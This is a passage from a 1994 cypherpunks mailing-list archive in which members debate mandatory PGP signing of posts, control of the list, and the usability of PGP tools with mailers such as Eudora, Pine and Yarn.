passphrase, of course). Additionally, there are scripts for Eudora such that you dont' even need to mess with the clipboard. You choose one script from a menu, click on the "sign" button, and your outgoing mail is signed. It would be trivial to convert the script to sign automatically instead of asking you whether you want to sign, encrypt or both. For whatever reasons, the tools that are there aren't good enough for Tim. Which is fine, I admit they still aren't perfect, and Tim, from what I understand, has a complicated situation wherein mac tools aren't good enough, he needs unix tools too. Personally, I've found unix and mac tools that are easy enough for me to use, but maybe I'm just a gearhead. Eventually easy-to- use-by-Tim's-standards tools will come around, and he'll use them. Or they'll never come around, and he won't. But I think many of his posts are really misleading in implying that there aren't any relatively easy-to-use tools out there. Maybe they're not easy enough for Tim (and I'm not being at all disparaging here. I am perfectly willing to admit that there is quite a bit of room for improvement with the existing tools), but I think the existing tools are orders of magnitude better then what existed, say, 8 months ago. I use premail on the unix, and the formentioned applescripts on my mac, and I am finally using PGP relatively reguarly, whereas 8 months ago the tools just weren't available that were simple enough for me to use. Again, I don't mean to be knocking Tim here. If the tools still aren't easy enough to install/use for Tim, I respect that. I just don't want people to get the wrong idea, and think that there aren't _any_ tools out there, or that the cypherpunks haven't been doing anything and there hasn't been any improvement in tools. I see incredible improvement in ease-of-use of available tools in the past 8 months to a year. -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLt4A9/HuNBekDKXJAQFmcAP/UedPs8ddpt4EHXTuo1ZkYiGrn9J9zSuy 00xM7B1XkiqJqmyOXU8pDaEHkmnEw/wkVH8Ibi8Ve8CtIiNA8xU5EOOCdp7J+Zh8 XwMiZES/J4f28WuipfN5dRPbwRI+aySKdJazOx0Wio2z+X1mtKvBmLQMrH09OlQ0 p1xi1HaGc0k= =iMRI -----END PGP SIGNATURE----- From hfinney at shell.portal.com Thu Dec 1 09:01:17 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 1 Dec 94 09:01:17 PST Subject: FWD: Oceania WWW site announcement Message-ID: <199412011701.JAA19689@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- We have had some discussion on the topic of new countries here so I thought I would forward this short note. I haven't looked at the web page yet. Apologies if you've seen it already. ========== Forwarded message ========== SENDER: Eric Klien Subject: ANNOUNCE: Oceania: The New Country - WWW Site A new web site has opened containing files related to the new country in development, Oceania. You may get the Constitution and Laws, plus information on related books such as The Atlantis Papers and The Millennial Project. You may also view true color pictures of Oceania plus view back issues of the Oceania Oracle. Animations of Oceania are also online as well as information on how to receive an Oceania passport. The web is located at http://unicycle.cs.tulane.edu/oceania -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt4BKhnMLJtOy9MBAQHt+AIAiJtsWrq+eQQ57xk9/XXuMtQ5eGUO2laV piQBPtpOQvn/2/tum3YUwG24cAhY3SleFynFXOzxJury7EbvRYStwA== =K3yA -----END PGP SIGNATURE----- From jamesd at netcom.com Thu Dec 1 09:04:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 1 Dec 94 09:04:41 PST Subject: We are ALL guests (except Eric) In-Reply-To: Message-ID: <199412011704.JAA19839@netcom12.netcom.com> Jonathan Rochkind writes > Assuming Eric could trademark the list, but just chooses not to, then > what's to stop _me_ from getting a trademark on the name "cypherpunks" when > I start my own competing list? Nothing, other than the fact it would not be the cypherpunks list, and there would not be a mass migration from Eric's list to yours. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From jrochkin at cs.oberlin.edu Thu Dec 1 09:23:29 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 09:23:29 PST Subject: We are ALL guests (except Eric) Message-ID: At 12:04 PM 12/01/94, James A. Donald wrote: >Jonathan Rochkind writes >> Assuming Eric could trademark the list, but just chooses not to, then >> what's to stop _me_ from getting a trademark on the name "cypherpunks" when >> I start my own competing list? > >Nothing, other than the fact it would not be the cypherpunks list, and >there would not be a mass migration from Eric's list to yours. Well yeah. That was my point. Whatever "ownership" Eric has of the list isn't dependent on trademarks, or on the fact that he was one of the "originators" of the list. It's dependent on the fact that we all use the cypherpunks that Eric administrates. Of course there is nothing to directly stop Eric from doing whatever he wants to configure the particular software currently running cypherpunks to do whatever he wants. But some of us, or most of us, or all of us, could just move to another list. Nearly painlessly, if the new list we moved to were set up to mirror the "real" cypherpunks, but without whatever rules we don't like. "The cypherpunks list" isn't the particular process that happens to be running on toad.com right now. It's not even the address "cypherpunks at toad.com." Eric has control over one of those, and John Gilmore has control over the other one, but "the cypherpunks list" isn't either of those, it's the group of subscribers and the articles they write, and no one "owns" that. From jamesd at netcom.com Thu Dec 1 09:27:13 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 1 Dec 94 09:27:13 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412011110.DAA26299@netcom3.netcom.com> Message-ID: <199412011726.JAA22930@netcom12.netcom.com> Timothy C. May writes > > > I rarely argue in terms of > > > justice and fairness, so please don't imply that I have done so. James A. Donald wrote: > > Look at the title of this thread. If what you say is true, > > you would not have responded to this thread. The title > > would be meaningless or irrelevant to you. Timothy C. May writes > Huh? The title of this thread makes an argument based on rights and obligation. It claims that Eric has the right to act without consensus. If you were merely making the argument that Eric is unwise to act, you would not have bothered to reply to this thread, since it does not address the issue of whether Eric is wise or unwise, but only the issue of who is entitled to decide. You were making the argument that Eric does not have the right, the authority to act without consensus, that he is improperly usurping the authority or rights of other founding cypherpunks. In other words you are responding to a moral argument with a moral argument. It is just that you use double talk and I speak plainly. Your argument is based on labor mingling theory, even though you seem to be unfamiliar with these concepts, (or perhaps you are familiar but simply refuse to the language of ethics.) While labor mingling theory has great moral authority, long usage on the internet has consistently gone the other way, and with the passage of time, this counts. The nature of the underlying protocols leads to collective ownership of newsgroups and private ownership of lists, and attempts to get away from this natural arrangement to something more useful and more just have not worked very well. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From cactus at bb.hks.net Thu Dec 1 09:28:43 1994 From: cactus at bb.hks.net (L. Todd Masco) Date: Thu, 1 Dec 94 09:28:43 PST Subject: New signing service Message-ID: <3bl1cc$7mn@bb.hks.net> Okay, this is a-what *I* am going to do right now. Today, I'll throw together a mechanism on cypherpunks at hks.net that will sign all messages coming through it and send them on to cypherpunks at toad.com. It'll have a key with a 384-bit modulus, included below. It will not (now) check signatures on incoming mail. It might in the future. To be clear, this is not what I suggested before: I will not be generating a new key for each message. This is also not a service that guarantees the integrity of mail before it reaches here: mail can easily be forged to this site. This will guarantee one and only one thing: that a message signed by this service has been received by cypherpunks at hks.net and forwarded to cypherpunks at toad.com. The only thing that this prevents is having mail forged to a subset of cypherpunks appear as though it went to all of cypherpunks. If this is successful I can later go on to attack the signing question, though I think key management is likely to be a genuine pain in the ass for that, probably requiring human interaction on a per-key basis. Also, when the software works smoothly it could be moved to toad.com. I think part of the job of mailing list software is to guarantee the integrity of the envelope a message: signing all messages is a clear step towards that goal. Please send comments to me directly at cactus at hks.net, since I won't necessarily be catching up on cypherpunks while I'm working on this. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQA9Ay7eB60AAAEBgOGkDzo6mkSp3G4W3EXwMWK8SrTVSmosuN5Y7Z2FdBS5uJ3o 1O0XNAwqGc8CJ9W3bQAFEbQuQ3lwaGVycHVuayBzaWduaW5nIGFnZW50IDxjeXBo ZXJwdW5rc0Boa3MubmV0Pg== =ajZM -----END PGP PUBLIC KEY BLOCK----- -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller From werewolf at io.org Thu Dec 1 09:31:54 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 1 Dec 94 09:31:54 PST Subject: "You aren't following the _rules_!" In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <7SMtkKjqRa71075yn at skypoint.com>, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >In article , you wrote: >> > I usually dial in to poly, I don't have (yet) a unix box on the net >> > to make signing easy. Until the DOS or Mac versions of PGP include >> > a built in terminal and mailer... >> >> You can use uqwk to download/upload both news and mail. You can then >> read/reply with an offline reader like yarn or ReadMail. Yarn has hooks >> to PGP, so signing a message is a menu choice. Installation could be >> easier, but once it's done, the combo works very smoothly. > >Even better yet use AUTOPGP and everything is signed automagicly. Any idea as to where I can get a copy of AUTOPGP? I'm a YARN user but would like to check it out. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt4Csa+YbMzawbu5AQEF7wQAxC9BxtvE4UPKQae3ti6eKfbvOCFBDAJJ v4nip8rYlZOfSd1TwjW0x1qwLwYtbthJ2ISzVaoLTgpEfpo+E8sNs49qHGtZwiSz yLJQuM7x+VN12hg0CACiPZCd6BK6evi5ZvfU4lwToJGABrhxPpteG6dUEkEdtRkU 6+dAoqNtCyI= =2LQb -----END PGP SIGNATURE----- From werewolf at io.org Thu Dec 1 09:38:57 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 1 Dec 94 09:38:57 PST Subject: AUTOPGP Message-ID: Anyone know where I can get a copy of AUTOPGP? I'd like to try it out and see whether it has any advantages over YARN's integrated PGP functions. -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From merriman at metronet.com Thu Dec 1 09:55:49 1994 From: merriman at metronet.com (David K. Merriman) Date: Thu, 1 Dec 94 09:55:49 PST Subject: Phbbbbbbbbt! Message-ID: <199412011756.AA24181@metronet.com> ***************** Begin PKP Signed Message ***************** Version 3.14159 A Proposal That It Be Resolved: * That Eric can, and will, do as he sees fit with the Cypherpunks mailing list on toad.com. * That Eric can, and will, do whatever he's going to do, whenever he does it. * That many have made their positions clear - amply, and repeatedly - on what they think of the various proposals put forth in response to Eric's initial posting, the clarifications, the clarified clarifications, the counter-proposals, counter-counter-proposals, ad nauseum. * That if/when Eric does something that those on the Cypherpunks mailing list do/don't agree with (or otherwise find inconvenient, distasteful, awkward, reprehensible, foolish, appropriate, called-for, suitable, necessary, ad nauseum), they will respond as they feel appropriate. * That responses to any actions taken by Eric may include letters of support/condemnation, forged/faked information, leaving in a snit/huff/quietly/loudly, formation of a C1Ph3rD00Dz mailing list, ranting, raving, cheering, applause, or whatever else the individual may feel appropriate. * That Eric has had ample opportunity to see the response to his proposal, and will therefore take it into consideration as he feels appropriate. * That the subject will not be properly addressed and resolved until and unless some _definitive_ action occurs. * That until and unless such action occurs, anything else is so much flailing about madly, with a fair measure of High Blood Pressure and Hurt Feelings tossed in. * That the subject has now been flogged to death, and that further discourse on it only serves to fragment the CP mailing list. Respectfully Submitted Dave Merriman ***************** Begin PKP Signature ***************** 1 ******************************************************* ****************** End PKP Signed Message ****************** - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From blancw at microsoft.com Thu Dec 1 09:57:34 1994 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 1 Dec 94 09:57:34 PST Subject: Mandatory sig workaround Message-ID: <9412011757.AA05329@netmail2.microsoft.com> From: Eric Hughes My priorities on this are to get myself set up for signing. Then I need to get a recognizer written, then to hack vacation to use alternate database files, then to get my own personal resource list compiled, then to set my personal nagware. Only after all that do I intend to alter the list. ...................................................................... ........... Me too - I'll sign my posts when I'm good & ready. Blanc From yusuf921 at uidaho.edu Thu Dec 1 10:03:43 1994 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Thu, 1 Dec 94 10:03:43 PST Subject: WHAT THE.. (was: Manditory key sig.. Message-ID: in all this discussion about how well it would work and ways around it, I think I've missed the problem that people are trying to solve. isn't it ironic that privacy advocates are suggesting manditory loss of anonimity (which is what forced signing is). From merriman at metronet.com Thu Dec 1 10:04:04 1994 From: merriman at metronet.com (David K. Merriman) Date: Thu, 1 Dec 94 10:04:04 PST Subject: Pbbbbbbbbbt! Message-ID: <199412011804.AA25584@metronet.com> ***************** Begin PKP Signed Message ***************** Version 3.14159 A Proposal That It Be Resolved: * That Eric can, and will, do as he sees fit with the Cypherpunks mailing list on toad.com. * That Eric can, and will, do whatever he's going to do, whenever he does it. * That many have made their positions clear - amply, and repeatedly - on what they think of the various proposals put forth in response to Eric's initial posting, the clarifications, the clarified clarifications, the counter-proposals, counter-counter-proposals, ad nauseum. * That if/when Eric does something that those on the Cypherpunks mailing list do/don't agree with (or otherwise find inconvenient, distasteful, awkward, reprehensible, foolish, appropriate, called-for, suitable, necessary, ad nauseum), they will respond as they feel appropriate. * That responses to any actions taken by Eric may include letters of support/condemnation, forged/faked information, leaving in a snit/huff/quietly/loudly, formation of a C1Ph3rD00Dz mailing list, ranting, raving, cheering, applause, or whatever else the individual may feel appropriate. * That Eric has had ample opportunity to see the response to his proposal, and will therefore take it into consideration as he feels appropriate. * That the subject will not be properly addressed and resolved until and unless some _definitive_ action occurs. * That until and unless such action occurs, anything else is so much flailing about madly, with a fair measure of High Blood Pressure and Hurt Feelings tossed in. * That the subject has now been flogged to death, and that further discourse on it only serves to fragment the CP mailing list. Respectfully Submitted Dave Merriman ***************** Begin PKP Signature ***************** 1 ******************************************************* ****************** End PKP Signed Message ****************** - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From eric at remailer.net Thu Dec 1 10:19:03 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 10:19:03 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412011109.DAA26184@netcom3.netcom.com> Message-ID: <199412011917.LAA13408@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) I haven't said I plan to leave the list. I've said that if my posts are blocked/bounced/rejected, I would likely choose not to remain. Let me ask something more proximate. Tim, if the server puts a header on mail that identifies it as unsigned, how will you feel about seeing your mail marked as such? What might you do about such a situation? I will register a note of purely personal frustration that many have framed the current debate in terms of "Eric's list" and "If Eric wants to do it this way, then this is how it should be done," etc. I have no animosity toward Eric, but think this is a misguided rewriting of history. Ah, assigning credit. Let the world know that there would be no cypherpunks without both Tim May and me. Tim and I met at a party at Hugh Daniel's place; we were the first two to arrive. We became pretty much instant friends when I said that I was going to work with Chaum in Amsterdam. A year later Tim was gracious enough to put me up at his place for a few days when I was there, ostensibly as it turned out, to look for housing. I was much more interested in conversation that accommodations, and Tim and I had a three day conversation in which the germ of cypherpunks was developed (among many others). Tim and I spent a lot of time later working on the first meeting, which was held with people we both knew. Why is it then, that people refer to "Eric's list"? At our first meeting, John Gilmore offered both a computer for a mailing list and a site for a meeting. We are no longer meeting at Cygnus, but we are still using John's machine. I began maintaining the mailing list, and with this was a symmetry breaking. As many of you know, I spent hours and hours and hours doing mailing list maintenance (adding and deleting by hand) and dealing with all of the problems. I don't spend so much time on that anymore because of majordomo, but I still do deal with the bounces and the complaints and the exceptional requests. Cypherpunks is certainly _not_ "Eric's group", but the mailing list is not unreasonably called "Eric's list". Personally, I hate the term "Eric's list". I try to avoid saying "my list" in coversation as shorthand for "the list I'm the maintainer for" because of the potential confusion with "the list I own". I find the property argument, at root, specious. Information can't be owned in any sort of natural sense, even though one _can_ remain vigorously silent. The comments of Dave Mandl and Todd Masco about the social character of mailing lists address the actual issue, which is political and not legal. Yet there is still the realpolitik that I do maintain the list. While there are some internal checks (I need Hugh's cooperation for certain things), the fact remains that I can make changes basically unilaterally. Pragmatically speaking, the phrase "Eric's list" reflects this situation. In addition, the phrase is short. When one is not distinguishing between subtleties, short phrases win and long phrases lose. So there are three reasons why the phrase arose: history, position, and brevity. When a deduction from the phrase relies upon some other possible subsumption, all may rightly point out an unintended meaning. Now we must shift subjects. What good is assigning credit if no use can be made of it? Many substitutes are available for obtaining a good feeling. Social position allows one to influence the world. One of the most valuable abilities in the world is the ability to get people to listen to you. This is not new, merely highlighted by the collapse-generating properties of computer networks. Tim and I and many others have spent much time devoted to writing clearly enough that we will be listened to preferentially, both for clarity itself and for the anticipation of clarity. The whole "cypherpunks write code" nexus assumes this communication process. It's comfortable to write manifestos, express your position, be indignant at the government, and teach privacy. We generally live in free societies where there is little recourse taken against speech. It is must less comfortable to use tortious cryptography, run a remailer, finesse export controls, and deploy code. Far and away the most extreme reactions have come from what people did and not from what they said. Speech affects the world, but action affects it more, because every word that affects the world only through a sequence of body motions. Cypherpunks get listened to not because we talk a lot; that's insufficient. Cypherpunks get listened to because we do things. "Actions speak louder than words" is true for local politics as well as global. Both Tim and I yammer a lot, but I do the list work. The assymetry is not incidental. In discussing potential server actions, I do not feel constrained come to agreement with any single voice, including Tim. I have a lot of respect for Tim and with respect to cypherpunks generally I try not to put myself above him, but with respect to the technical underpinnings of the list I feel no such constraint. This difference is a long consequence of actions chosen by both parties. Now, Tim, I don't know exactly that you feel slighted in this debate with respect to origins and their values, but I suspect that you do. If so, I regret that, but ask you to, well, deal with it. Symmetry is broken, cypherpunks is no longer new, and we who appeared interchangeable to the world two years ago now seem different. Eric From blancw at microsoft.com Thu Dec 1 10:21:50 1994 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 1 Dec 94 10:21:50 PST Subject: We are ALL guests (except Eric) Message-ID: <9412011821.AA07476@netmail2.microsoft.com> From: Eric Hughes These discussions on the interest of power are fascinating to me. So many of them do not take into account my own desires to create a useful discussion forum, which desires bind me tighter than any law ever could. There are some very interesting implications of this _de facto_ solipsism to achievement of equilibria in games with iterated dominance. ......................................................................... Eric is so cool for starting a flame war about his authority, on his very semi-own list. Turn-around is fair play, do unto others, and all that. For myself, I list below some items of importance which I would look for in deciding whether to participate with expectations of complicity to any given 'rules': . advance knowledge of the requirements & procedures . whether they are consistent with the purpose they serve . whether there has been an intelligent argument presented which would convince me that it is more advantageous to do as expected, than not . that there have been means provided to be able to follow through, or that . there has been information provided on how to obtain the means needed for follow through . that information is available on how to overcome the obstacles & difficulties which could prevent adherence to the given requirements i.e., that those who place certain requirements upon membership also make it possible to comply with them by preparing the way, making it easy to do so and providing sufficient appeal to make it worth the trouble. Blanc From merriman at metronet.com Thu Dec 1 10:24:26 1994 From: merriman at metronet.com (David K. Merriman) Date: Thu, 1 Dec 94 10:24:26 PST Subject: apologies Message-ID: <199412011824.AA29260@metronet.com> My apologies for the second posting of my Proposal - the first one came back from toad at the end of a notice that an individuals account was closed (??). Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From eric at remailer.net Thu Dec 1 10:51:21 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 10:51:21 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412010119.RAA06900@python> Message-ID: <199412011950.LAA13468@largo.remailer.net> From: "Dr. D.C. Williams" While I can see merit in both sides, the pro-sig argument is weakened by their endorsement of sig spoofing. If the object is to heighten awareness of crypto and digital signatures, what possible Good can follow from setting the example that "cypherpunks simulate signatures"? To someone who doesn't know what a digital signature is at all, it doesn't matter if it's real or faked. Communication to these people is entirely from the odd-looking form of the appendages. The ability to spoof a signature is an artifact of incomplete notions and implementations about key distribution. Were these problems solved, I would consider actually verifying all signatures. These problems are not solved to my satisfaction, however. The inability to check a signature does not, however, render useless those other functions that still work. I advocate partial progress, and the lack of a benefit is not sufficient argument against things that actually work. The way I see it, either sign or don't sign, but attaching a bogus signature block to a message for the sole purpose of pacifying a mailing list requirement diminishes the significance of crypto and sullies the image of all who participate. If you don't have a public key, it doesn't matter if the signature was real or faked; you still can't verify it. One of the purposes of this proposal is to encourage people to change their software to automatically sign. The harder part of this is to change it to do anything automatically. The signature making part is fairly trivial by comparison. The benefit I want more, of the two, is the automaticity. If, for whatever reason, actual signing can't happen, I am content with the form of a signature. Make a new key pair that's used solely for the purpose of signing your list mailings. That's fine, and I agree with the idea as a solution to the insecurity of keys on a public machine. I do not, however, feel I need to insist that everyone do this. By the same token, I don't see how this proposal does much to spread the Good Word. 1. Crypto-unaware people will see the form and ask what it is. 2. Crypto-aware people will alter their software to do something automatically. 2a. Many, perhaps most, of these people will use real crypto once auto-something already set up. Eric From geoffrey at crl.com Thu Dec 1 11:06:11 1994 From: geoffrey at crl.com (Geoffrey Faivre-Malloy) Date: Thu, 1 Dec 94 11:06:11 PST Subject: Pine and PGP Message-ID: Is there a way to have my messages signed automatically with Pine and PGP? Geoffrey -------------------------------------------------------------------------- | Geoffrey at crl.com The opinions expressed herein may or | | Geoffrey Faivre-Malloy may not be the opinions of my employer.| | Purple Duck Software Like anyone really cares... | -------------------------------------------------------------------------- | Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342 | -------------------------------------------------------------------------- From eric at remailer.net Thu Dec 1 11:07:07 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:07:07 PST Subject: "Cyherpunks Named Official Signing Authority" In-Reply-To: <74242.pfarrell@netcom.com> Message-ID: <199412012005.MAA13503@largo.remailer.net> From: "Pat Farrell" Re: majordomo alterations so that it pipes messages thru a filter to classify signatures. [...] We get classes like: [5 listed] What I was thinking was the following. There would be a recognizer that, given a message, would output "yes, something looks like a signature to me", or "no, there is nothing that I recognize as a signature". Based on this true/false answer, the server would either perform an action, or not. I was thinking of no notion of classes, but rather mere presence or absence. Maybe we need to have majordomo sign the message/header so we know that the true c'punk classifier has verified it? WARNING: The following paragraph does not have direct relevance to the issue at hand. It discusses servers which might verify signatures, which my current proposal does not have in it. What I have realized in the interim is, that if a server is to verify a signature, the server should sign not the message but rather the signature. After all, the signature is what was being verified, not any property of the message. The user can still detect message alteration, by first verifying the sig-on-sig, and then comparing the hash value in the original sig to a hash on the message. But then we ask, Hmmm, is this a hacked majordomo? After all, no sane person will read and manually verify the flood of c'punk messages. So some daemon is doing it all. And daemons can be hacked. Trust always terminates somewhere. How far back you go is a question of worth and of effort. Ceding some trust to toad.com may be desirable for some but not for others. Merely because it is not a complete solution to all problems doesn't mean it's not worth doing. anyone else see a solution? I do, but it involves program+proof ideas and is far from ready for deployment. I have no interest in solving those problems right now. There is benefit to be had from crypto, even if the first implementations only protect certain things. Eric From eric at remailer.net Thu Dec 1 11:13:51 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:13:51 PST Subject: We are ALL guests (except Eric) In-Reply-To: <3bje7f$snh@bb.hks.net> Message-ID: <199412012012.MAA13524@largo.remailer.net> From: cactus at bb.hks.net (L. Todd Masco) >To reiterate, I am willing to use my >position to send a stronger message. Sure. I'm not sure the message would get through as you're framing it, though. People don't react well to messages that are put too strongly... a gentle, gradual approach is more likely to get through. Several approaches to gradualism have been usefully suggested in this debate, and I appreciate that. Just to be sure, I was expressing a willingness, not an imminent intent. Eric From eric at remailer.net Thu Dec 1 11:16:21 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:16:21 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: Message-ID: <199412012014.MAA13543@largo.remailer.net> From: werewolf at io.org (Mark Terka) If thats the case.....isn't it an equal pain in the ass to go to the trouble of forging a sig? :> You would likely have to go through more key strokes and other routines to forge one. Why not just play by the rules and sign a message? This is a perfectly good rephrasing of one of the main rationales behind the proposal, namely, that the architectural issues are more important than the actual crypto use. (Not exclusively important, but more important.) Eric From tcmay at netcom.com Thu Dec 1 11:18:24 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 11:18:24 PST Subject: Mandatory sig workaround In-Reply-To: <941201.071127.7W2.rusnews.w165w@cybrspc.mn.org> Message-ID: <199412011918.LAA21104@netcom4.netcom.com> Roy M. Silvernail wrote: > > "Plenty of irons in the fire" is indeed the crucial point. Learning > > how to make UQWK talk to AutoPGP in elm (or whatever) is apparently > > fine for some people (by my estimate, 20% of those who post), but many > > of the most valued (who shall remain nameless here) posters are *not* > > signing posts. I urge you all to watch who signs and who doesn't. > > It may just be that it's early and I'm only on my first cup of coffee, > but are you suggesting an inverse correlation between the quality of a > submission and the presence of a signature, Tim? While I'd agree that > many of the quality list members don't sign their articles, I don't > think I can make the leap that signed messages have no useful content. > Please tell me I misread you. No, I didn't propose such a correlation. Just a reminder that _many_ active posters are not routinely, or ever, signing. This is probably not due to a minor (few second) delay but, rather, to much large hassles (discussed here often, but having to do with editors on remote machines not having access to PGP tools and keys on local machines--this can be solved by moving the PGP onto the remote machine or by sending the file to local machines with sz, etc.). > > Face it, some fraction of people on this list are gearheads, with > > their own Pentiums or Suns sitting on the Net and with lots of > > Unix/Linux tools they like to play with and that they can use to > > compile their premails and procmails and whatnot. More power to them. > > Or perhaps just a lowly 486 running DOS and UUCP. But I heard that > Cypherpunks Write Code, so I wrote PGP support into my signature > controller. I have signed all my email for 2 years, and all net traffic > for nearly a year. Gearhead? Perhaps I am. But this ain't no Porsche. Like I said, "more power to them." I haven't gone this route, and face, under the proposed system(s), delays and perhaps bounces. For many reasons I think this is an unwise proposal. > Which only underscores the need for better tools for the existing > platforms. Yes, I'd like everyone to sign their traffic. But it's not > always possible when the tools to do that are either non-existant or > arcane (which means I'm in agreement with Tim on why he doesn't sign his > traffic). You've just answered your earlier points. Let me recount something that hasn't been mentioned on the list. At the last Cypherpunks meeting, well-known Unix gearhead Raph Levien demonstated his premail work: nearly transparent encryption, decryption, remailing integrated into "pine," a mailer. Something this "simple" (no insult to the work meant...I mean simple in the sense that it is conceptually obvious and expected) drew oohs and aahs from the generally savvy attendees. It tells us something. (Yes, I may consider switching from my favored mail reader, elm, to pine. But not soon, and maybe not ever.) > Tim, just for fun, what tools would need to appear to make it possible > for you to sign your traffic? Maybe a description will inspire some of > the Macheads out there to get hacking. (the astute reader will note > that I'm not suggesting new tools to the erstwhile Mr. May, as has been > done so often in the past) Others have touched on this. MIME stuff, mail wrappers, etc. There are three main worlds to consider: 1. Users on their own secure machines, composing, signing, and encrypting with tools on their own machine. Completed messages are either mailed (e.g., Eudora, dial-up) or are otherwise send directly (boxes sitting on the Net via SLIP, PPP, TIA, etc.) 2. Users who do some of their work on secure machines (perhaps at home) but log in to remote machines that are not secure against packet sniffers, snooping sysadmins, subpoenas (which may not even be disclosed to the target, as in cases involving money transfers, drug cases, etc.). 3. Users who do most of their work on unsecure machines outside their control. Most corporate users who use corporate machines. Most university students with campus accounts. PGP can and is used in all of these worlds. #1 is taken care of by lots of tools. (And if I limited my mail to Eudora, I could cope moderately well. But I don't even have Eudora running on my new Mac configuration yet, and I favor reading mail while logged-on to Netcom. Also, signing Netnews articles--not the topic of current debate--is not addressed. #2 is where additional tools are needed. A useful tool: agent-like technology that could "reach back" with a zmodem-like squirting of text to the local/home machine, do the sigs and encryption, and then squirt back the processed text. (Ironically, short messages are moderately easy for me to verify, as I can select the displayed text and use cut-and-paste. So long as all the text is visible. Longer text messages require that I somehow get the text--often by using sz to send it to my local machine--and this typically takes more steps and requires more choices than I want to deal with.). #3 users are probably happy in their ignorance and have others to help them with setups and configs. That so many students are diligent about signing their messages--on "foobar.edu"--says a lot about the spread of tools, helps, and common set of tools (e.g., everybody may be using 4.3 BSD and the same core set of editors and mailers). I am dismissive of #3 because it's toy security. Not a foundation to build on. But OK for students. Or employees. Or casual use. Enough for now. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From eric at remailer.net Thu Dec 1 11:26:01 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:26:01 PST Subject: Hazards of encouraging forged dig sigs In-Reply-To: <199412010326.WAA22171@ducie.cs.umass.edu> Message-ID: <199412012024.MAA13573@largo.remailer.net> From: "L. McCarthy" I foresee a situation in which a large portion of the list traffic uses forged or meaningless signing-server-appended dig sigs. When I establish automatic signature validation for incoming mail here Real Soon Now, there will be plenty of noise generated by all the `false' negatives in the data to make a mockery of the authentication process. Recall my comments on transaction failure in a different context last week. What is important there is what happens under failure, not under success. Sig checking requires an analysis of the pragmatics of failure, i.e. what happens. What seems abundantly clear, no matter what actions are taken, is that it will be actions plural rather than action singular. The decision process to decide what happens is much more significant architecturally that what actually does happen. An embedded action, i.e. a hardcoded policy, would be bad, and since sig failure handling is a relatively unexplored area, one can do it right the first time. Assuming such a failure recovery decision process, the actions are simple: ignore, flag, discard, bounce, get key, etc. None are particularly difficult; the decider is what is hard. Now, assuming both decider and actions, you can very simply ignore all sig failure for cypherpunks. Encouraging cryptographically valid signatures was the first suggestion I'd seen in this entire debate which seemed to promise tangible benefits; Syntactic checking also encourages valid signatures, just not as strongly. encouraging cryptographically invalid signatures is the first notion which appears to offer tangible detriment. It's a problem that won't go away that the existence of bogus signatures merely make the problem imminent and proximate. Eric From an234 at vox.xs4all.nl Thu Dec 1 11:31:06 1994 From: an234 at vox.xs4all.nl (N. Cognito) Date: Thu, 1 Dec 94 11:31:06 PST Subject: WHAT THE.. (was: Manditory key sig.. Message-ID: <199412011932.AA22632@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 1 Dec 1994 